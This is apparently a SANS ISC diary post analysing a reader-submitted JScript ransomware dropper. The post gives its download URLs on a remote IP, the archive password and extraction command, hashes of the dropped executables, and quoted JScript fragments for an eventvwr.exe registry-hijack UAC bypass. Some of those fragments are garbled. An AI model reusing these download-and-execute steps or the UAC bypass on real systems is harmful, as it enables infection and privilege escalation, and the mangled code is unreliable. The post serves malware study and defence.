Yesterday, one of our readers sent us a malicious piece of JScript: doc2016044457899656.pdf.js.js. Its always interesting to have a look at samples coming from alternate sources because they may slightly differ from what we usually receive on a daily basis. Only yesterday, my spam trap collected 488 ransomware samples from the different campaigns but always based on the same techniques.
The JScript code was, of course, obfuscated but it was easily read by a human. Usually, there is no need to implement complex obfuscation to bypass AV detection. This sample had a score of 8/54 on VT. What was different? First of all, it just tries to download two files from a remote server:
- http://45.58.49.54/7za.exe
- http://45.58.49.54/process.zip
The bad guy was lazy (or smart?) and did not implement"> var AACRSODLXACCGDOLOSOX = LXCTAOHOHSYOAASHNDCA(6D696E617331303030"> 6D696E617331303030.decode(hex)minas1000
The destination path is generated via multiple variables and is finally set to C:\Users\[user]\AppData\Local\, user being the victim"> C:\Users\[user]\AppData\Local\7za.exe x C:\Users\[user]\AppData\Local\COCNOACTXATASGNOTOAS -pminas1000 -o C:\Users\[user]\AppData\Local\
Two new PE files are stored on the file system then executed:
- processexplorerpe.exe (55c0548290a5dc43bc54a6a15ccd42fd) [2]
- peprocesss.exe (6b96e8a9c13966086b1e2dd65ac84656) [3]
What makes this sample different? After the classic execution of the PE files, it tries to bypass the Windows UAC using a feature present in eventvwr.exe. This system tool runs as a high integrity process and uses HKCU / HKCR registry hives to start mmc.exe which opens finally eventvwr.msc. More information about this behaviour is available on the Microsoft website[4].
The trick is to create the registry entry that is checked by eventvwr.exe and to store the malicious binary (ODASTATACOTSTAODHOOD"> var WshShell = WScript.CreateObject (WScript.ShellWshShell.RegWrite (HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\\, ODASTATACOTSTAODHOOD, REG_SZ"> var ZLGOZYLOLHONHTXTAOOR = environmentVars(WINDIR) + \\SYSTEM32\\+eventvwr.exeAAOGAODYSCSTSOAOLHAC = new ActiveXObject(Wscript.Shell
Letvar wshShell = new ActiveXObject(WScript.ShellwshShell.Run(REG DELETE HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /ve /f
More information about this technique to bypass UAC is available on github.com[5] with a PoC script in Powershell.
If you receive interesting samples, feel free to share them! We always need fresh meat!
[1] http://www.7-zip.org/download.html
[2] https://www.virustotal.com/en/file/305fe0e8e8753dd2bf79fd349760b5c83d75097becc98a541b489bd5456b7b5e/analysis/
[3] https://www.virustotal.com/en/file/7b1f0831ea6943fb1f2a2714f71b16c890baf15c985833e0a590fe6545c7e16f/analysis/
[4] https://msdn.microsoft.com/en-us/library/bb742441.aspx
[5] https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key